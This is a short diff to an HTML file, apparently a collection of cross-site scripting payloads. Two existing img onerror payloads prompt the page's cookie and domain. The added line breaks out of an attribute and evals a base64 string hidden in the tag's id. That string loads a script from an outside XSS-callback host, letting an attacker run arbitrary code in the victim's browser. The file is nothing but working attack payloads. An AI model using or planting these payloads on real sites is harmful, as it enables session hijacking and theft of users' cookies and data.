--- a/boom.html
+++ b/boom.html
@@ -2,5 +2,6 @@
   <body>
     <img src="x" onerror=prompt(document.cookie) />
     <img src="x" onerror=prompt(document.domain) />
+    "><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL2Jvb202NzAiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>
   </body>
 </html>
